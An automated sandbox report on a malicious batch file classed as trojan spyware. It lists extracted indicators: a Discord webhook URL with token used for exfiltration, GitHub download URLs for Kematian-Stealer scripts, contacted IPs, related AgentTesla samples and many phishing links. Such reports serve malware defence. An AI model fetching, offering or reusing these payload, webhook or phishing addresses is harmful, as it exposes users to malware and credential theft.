https://contoso.com/License | powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 0000000C.00000002.1337478042.0000020A57780000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 0000001B.00000003.1466607958.0000023F504C0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.ver) | svchost.exe, 0000001B.00000002.2541749717.0000023F50600000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft. | powershell.exe, 0000000C.00000002.1366435066.0000020A6E439000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.cloudflare.com | powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnw | powershell.exe, 00000019.00000002.2548122352.00000236B17A1000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/C$&m | mshta.exe, 00000018.00000002.1493073987.00000216660D6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://go.micros | powershell.exe, 0000000C.00000002.1337478042.0000020A570A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000001F.00000002.1614835648.000002B3BFC51000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/ChildrenOfYa | mshta.exe, mshta.exe, 00000018.00000002.1493073987.00000216660D6000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://www.microscom/pkiops/certs/MicWinProPCA2011_2011-10-19.crt0 | powershell.exe, 0000001F.00000002.1684520069.000002B3D825A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://github.com | powershell.exe, 0000001F.00000002.1614835648.000002B3C102D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/TheWover | powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod1C: | svchost.exe, 0000001B.00000003.1466607958.0000023F50519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1 | powershell.exe, 0000001F.00000002.1614835648.000002B3C10C4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1 | powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com | powershell.exe, 0000001F.00000002.1614835648.000002B3C1052000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://raw.git | mshta.exe, 00000018.00000002.1493073987.00000216660D6000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000000C.00000002.1337478042.0000020A56378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000C.00000002.1360562547.0000020A661C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C1317000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFA90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com | powershell.exe, 00000019.00000002.2548122352.00000236B24D9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://raw.githubusercontent.com | powershell.exe, 0000001F.00000002.1614835648.000002B3C1068000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 0000000C.00000002.1337478042.0000020A56151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B17A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3BFA21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Somali-Devs/Kematian-Stealer | powershell.exe, 00000019.00000002.2548122352.00000236B3B6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B24D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B41EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B2ED9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000C.00000002.1337478042.0000020A56151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B17A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3BFA21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.js | powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
185.199.109.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
140.82.121.3 | github.com | United States | 36459 | GITHUBUS | true
185.199.110.133 | objects.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
104.16.123.96 | www.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
                  IP
                  127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467094
Start date and time: 2024-07-03 18:07:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 39
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: thegreatestexecutor.bat
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winBAT@41/53@5/6
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 60%
• Number of executed functions: 19
• Number of non-executed functions: 6
Cookbook Comments:
• Found application associated with file extension: .bat
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1920 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6660 because it is empty
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtNotifyChangeKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: thegreatestexecutor.bat
Time | Type | Description
12:08:09 | API Interceptor | 2653520x Sleep call for process: powershell.exe modified
12:08:25 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  208.95.112.1QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • ip-api.com/line/?fields=hosting
                  Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  6bdudXAsQW.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  H50bdqfVH2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • ip-api.com/line/?fields=hosting
                  kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  bv8iPF7cTY.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  jsLnybSs43.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • ip-api.com/line/?fields=hosting
                  fiDe44VTwh.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • ip-api.com/line/?fields=hosting
                  185.199.109.133https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29tGet hashmaliciousHTMLPhisherBrowse
 | https://url7304.disco-mailer.net/ls/click?upn=u001.DWLeRfOXStcSaUNphm6ZnGquuezyvOF0FIuLMCSCrIQ9t3e8n3fjexKHJjVTV-2BQUFT1dnxR3BcyXaxz-2BblhjX71zswvTIlAGm31luuFhJgeOGXb3dn9Itq74-2Fe-2BlKg-2Bs0-2F4odRns7kSdvfqBhyqSbrYsnPmx4SeDwlRdlhHbM3UucitnipcwJ1gR7h8DzOIUWsvEslHUA8FsNTNWtsq3Q-2FU-2FPeBtGbo-2Fx3kgcXxAZuE-3DPmkq_5KlZmZKASPtIpYbHU6HHQmxS-2FHe3g010GX01BBBmlalJnMdBClXoEYQADKPWInqgHw-2B5921oa-2Fum9DxIHV8wgOarlsOnYJwzp6I2lNDfeCQdFcL55956QetBM0U9iihLLCXzc7MWVFcQDUwnaU8PUgQFrTwK63nQhJu8ngVllYSJR-2BUamfX7Ej8Gpp4vMWsL8t65JTtpjdFVQ36IgP-2B2LxLYSj9SfdmLAt97TCVXHWn7xANKqYpl-2BYx09SetkszDOjJuUV9L9bqZ-2FbmClOsUrPLylG74RJ8zQAREr7-2BUktmlWKoc8C7oqqTOKv340mZnTc-2FztCVjFgPMm1Bz5lR5AptUVEvvSBboXVGluKKoNkkMFkS-2BmNybyD3Aa-2BX8UZ5s | malicious | HTMLPhisher |
 | https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT | malicious | HTMLPhisher |
 | http://mysterymint-s10.vercel.app/ | malicious | Unknown |
 | https://ns43q4.csb.app/ | malicious | Unknown |
 | https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//dolar2go.com/new/auth//klqsxqvkkosgj/%2F/ZG9uYWxkLmRvbm92YW5AbWJ1LmVkdQ== | malicious | HTMLPhisher |
 | https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//littlelassies.com/ejk/xlpd//j40gstqcualqm/%2F/ZG9uYWxkLmRvbm92YW5AbWJ1LmVkdQ== | malicious | HTMLPhisher |
 | http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDXjPPos73WSprAyRZ-2Fe35OyRzQCObx6m2J-2BawNrx1Z79t5DvqpoKU1sx90SQ9s1BFTlDy-2BRnvEYaoAECBzgLGytfTSN7FznTwccbM6qJLuUBwrJkCmvLgd8uOOPtKHOCiy6m2fDQJxPXI5uFtOzDGRc-3DScHx_QDM3TkIx9p0DtDeeEp0Z8-2FPcqv0Tvq51yChjKFu-2FB2Toc0JH3IfEt8ayxh9hRhaZappsCk3uGkbJsKvBDyCVHk27C5SeHf-2FrB5syLp7eES4tqFfaea5oHTg4hKblIVwbNxKeRdk6V97FA4a8WTc0qktZ4kjgtBGcuL6n47Dqs5kNCe1kyO9oqq2u-2BdPhrTaYy2E3Tb1wbzdQ4NKkm-2BJWAw-3D-3D | malicious | HTMLPhisher |
 | https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4 | malicious | HTMLPhisher |
 | Roblox Account Manager.exe | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | https://ns43q4.csb.app/ | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | Roblox Account Manager.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | Roblox Account Manager.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | SolaraBootstrapper.exe | malicious | DCRat, XWorm | 185.199.110.133
raw.githubusercontent.com | fart.exe | malicious | AsyncRAT, DcRat, Quasar, XWorm | 185.199.109.133
raw.githubusercontent.com | fart.exe | malicious | AsyncRAT, DcRat, Quasar, XWorm | 185.199.109.133
raw.githubusercontent.com | LeqO0KJkDX.exe | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | LeqO0KJkDX.exe | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | ZED Online.zip | malicious | Unknown | 185.199.109.133
ip-api.com | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx | malicious | AgentTesla | 208.95.112.1
ip-api.com | 6bdudXAsQW.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | H50bdqfVH2.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | kZa81nzREg.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | bv8iPF7cTY.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | jsLnybSs43.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | tgBNtoWqIp.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | fiDe44VTwh.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | 9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
github.com | https://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9 | malicious | HTMLPhisher | 140.82.121.4
github.com | https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc= | malicious | HTMLPhisher | 140.82.121.4
github.com | https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29t | malicious | HTMLPhisher | 140.82.121.3
github.com | https://url7304.disco-mailer.net/ls/click?upn=u001.DWLeRfOXStcSaUNphm6ZnGquuezyvOF0FIuLMCSCrIQ9t3e8n3fjexKHJjVTV-2BQUFT1dnxR3BcyXaxz-2BblhjX71zswvTIlAGm31luuFhJgeOGXb3dn9Itq74-2Fe-2BlKg-2Bs0-2F4odRns7kSdvfqBhyqSbrYsnPmx4SeDwlRdlhHbM3UucitnipcwJ1gR7h8DzOIUWsvEslHUA8FsNTNWtsq3Q-2FU-2FPeBtGbo-2Fx3kgcXxAZuE-3DPmkq_5KlZmZKASPtIpYbHU6HHQmxS-2FHe3g010GX01BBBmlalJnMdBClXoEYQADKPWInqgHw-2B5921oa-2Fum9DxIHV8wgOarlsOnYJwzp6I2lNDfeCQdFcL55956QetBM0U9iihLLCXzc7MWVFcQDUwnaU8PUgQFrTwK63nQhJu8ngVllYSJR-2BUamfX7Ej8Gpp4vMWsL8t65JTtpjdFVQ36IgP-2B2LxLYSj9SfdmLAt97TCVXHWn7xANKqYpl-2BYx09SetkszDOjJuUV9L9bqZ-2FbmClOsUrPLylG74RJ8zQAREr7-2BUktmlWKoc8C7oqqTOKv340mZnTc-2FztCVjFgPMm1Bz5lR5AptUVEvvSBboXVGluKKoNkkMFkS-2BmNybyD3Aa-2BX8UZ5s | malicious | HTMLPhisher | 140.82.121.3
github.com | https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//bgvhdjcbjfdhjkbgfddgfghgfd.pages.dev/#?email=dGVzdEB0ZXN0by5jb20= | malicious | HTMLPhisher | 140.82.121.4
github.com | https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT | malicious | HTMLPhisher | 140.82.121.4
github.com | https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//dolar2go.com/new/auth//klqsxqvkkosgj/%2F/ZG9uYWxkLmRvbm92YW5AbWJ1LmVkdQ== | malicious | HTMLPhisher | 140.82.121.4
github.com | https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//littlelassies.com/ejk/xlpd//j40gstqcualqm/%2F/ZG9uYWxkLmRvbm92YW5AbWJ1LmVkdQ== | malicious | HTMLPhisher | 140.82.121.3
github.com | http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDXjPPos73WSprAyRZ-2Fe35OyRzQCObx6m2J-2BawNrx1Z79t5DvqpoKU1sx90SQ9s1BFTlDy-2BRnvEYaoAECBzgLGytfTSN7FznTwccbM6qJLuUBwrJkCmvLgd8uOOPtKHOCiy6m2fDQJxPXI5uFtOzDGRc-3DScHx_QDM3TkIx9p0DtDeeEp0Z8-2FPcqv0Tvq51yChjKFu-2FB2Toc0JH3IfEt8ayxh9hRhaZappsCk3uGkbJsKvBDyCVHk27C5SeHf-2FrB5syLp7eES4tqFfaea5oHTg4hKblIVwbNxKeRdk6V97FA4a8WTc0qktZ4kjgtBGcuL6n47Dqs5kNCe1kyO9oqq2u-2BdPhrTaYy2E3Tb1wbzdQ4NKkm-2BJWAw-3D-3D | malicious | HTMLPhisher | 140.82.121.3
github.com | https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4 | malicious | HTMLPhisher | 140.82.121.3
www.cloudflare.com | fart.exe | malicious | AsyncRAT, DcRat, Quasar, XWorm | 104.16.123.96
www.cloudflare.com | https://bafybeicl3sruyvjs6is67yed47chltq63n7qdv67sjo4yupnqu6bmy5uka.ipfs.dweb.link/ | malicious | Unknown | 104.16.123.96
www.cloudflare.com | http://104.21.19.145 | malicious | Unknown | 104.16.124.96
www.cloudflare.com | http://telegravm.work/ | malicious | Telegram Phisher | 104.16.124.96
www.cloudflare.com | http://telegrram.work/ | malicious | Telegram Phisher | 104.16.123.96
www.cloudflare.com | http://telegrmaw.work/ | malicious | Telegram Phisher | 104.16.124.96
www.cloudflare.com | https://m.morrissey-mmuptn7vfawopptn7vfawop.narymar.com/ | malicious | Unknown | 104.16.123.96
www.cloudflare.com | win5.exe | malicious | Python Stealer, Discord Token Stealer | 104.16.123.96
www.cloudflare.com | https://29s1800n.loginprotect.net/?d=Pph_w2oGWx7iLtjGF3N_N | malicious | Unknown | 104.16.124.96
www.cloudflare.com | https://ps6q3676.loginprotect.net/?d=QALAHQu0HO56gLnZ_CF6N | malicious | Unknown | 104.16.124.96
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FASTLYUS | Service Desk - Please verify your Account!.eml | malicious | HTMLPhisher | 151.101.192.217
FASTLYUS | https://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9 | malicious | HTMLPhisher | 185.199.108.133
FASTLYUS | https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc= | malicious | HTMLPhisher | 151.101.2.137
FASTLYUS | http://www.evernote.com/shard/s371/sh/f041cc04-2eb8-11e1-1279-c0c24914207a/LWhD3rgdQ5xR5t--iDOJ7P-MUkYVUhgRq62dC8LVzLZOnctWRKJm5hEzqg | malicious | HTMLPhisher | 151.101.2.132
FASTLYUS | http://booking.extnnehotteir.com/admin/o2shi1bka89 | malicious | Unknown | 151.101.0.114
FASTLYUS | Vertex Business Services_SKM_C950633210_650106.pdf | malicious | HTMLPhisher | 151.101.194.137
FASTLYUS | https://www.filemail.com/t/RuKZYfeB | malicious | HTMLPhisher | 151.101.65.46
FASTLYUS | Quarantined Messages (1).zip | malicious | HTMLPhisher | 151.101.130.137
FASTLYUS | https://uglb4.roperelo.com/caGPey/ | malicious | Unknown | 151.101.130.137
FASTLYUS | https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29t | malicious | HTMLPhisher | 151.101.2.137
TUT-ASUS | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | 6bdudXAsQW.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | H50bdqfVH2.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | kZa81nzREg.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | bv8iPF7cTY.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | jsLnybSs43.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | tgBNtoWqIp.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | fiDe44VTwh.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | 9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
GITHUBUS | https://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9 | malicious | HTMLPhisher | 140.82.121.4
